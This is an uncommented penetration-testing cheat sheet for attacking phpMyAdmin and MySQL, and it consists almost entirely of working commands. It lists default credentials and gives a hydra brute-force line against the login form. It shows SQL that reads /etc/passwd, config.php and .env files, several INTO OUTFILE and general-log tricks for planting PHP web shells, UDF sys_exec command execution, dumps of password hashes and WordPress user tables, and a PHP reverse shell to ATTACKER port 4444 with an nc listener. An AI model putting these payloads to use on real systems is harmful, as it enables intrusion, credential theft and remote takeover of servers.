PHPMyAdmin

/phpmyadmin
/phpMyAdmin
/pma
/dbadmin
/mysql
/admin
/sql

root:<blank>
root:root
root:toor
admin:admin
mysql:mysql
pma:pma

hydra -L users.txt -P passwords.txt TARGET http-post-form "/phpmyadmin/index.php:pma_username=^USER^&pma_password=^PASS^:Cannot log in"

phpMyAdmin 4.8.1

searchsploit phpmyadmin 4.8

SELECT LOAD_FILE('/etc/passwd');
SELECT LOAD_FILE('C:/Windows/win.ini');
SELECT LOAD_FILE('/var/www/html/config.php');

SELECT LOAD_FILE('/var/www/html/.env');

SHOW VARIABLES LIKE "secure_file_priv";

SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/www/html/shell.php';

http://TARGET/shell.php?cmd=id

SELECT "<HTML><BODY><FORM METHOD=\"GET\" NAME=\"f\"><INPUT TYPE=\"text\" NAME=\"cmd\"><INPUT TYPE=\"submit\"></FORM><pre><?php system($_GET['cmd']); ?></pre></BODY></HTML>"
INTO OUTFILE 'C:\\xampp\\htdocs\\cmd.php';

SHOW VARIABLES LIKE 'datadir';

SELECT "<?php system($_GET['cmd']); ?>"
INTO OUTFILE '/var/lib/mysql/shell.php';

SET GLOBAL general_log = 'ON';
SET GLOBAL general_log_file = '/var/www/html/log.php';
SELECT "<?php system($_GET['cmd']); ?>";

SELECT user, file_priv, super_priv FROM mysql.user;

searchsploit mysql udf

CREATE FUNCTION sys_exec RETURNS INT SONAME 'lib_mysqludf_sys.so';
SELECT sys_exec('id');

SELECT user,host,authentication_string FROM mysql.user;

SELECT user,password FROM mysql.user;

SHOW DATABASES;
USE wordpress;
SHOW TABLES;
SELECT * FROM wp_users;

SELECT "<?php system('bash -c \"bash -i >& /dev/tcp/ATTACKER/4444 0>&1\"'); ?>"
INTO OUTFILE '/var/www/html/rev.php';

nc -lvnp 4444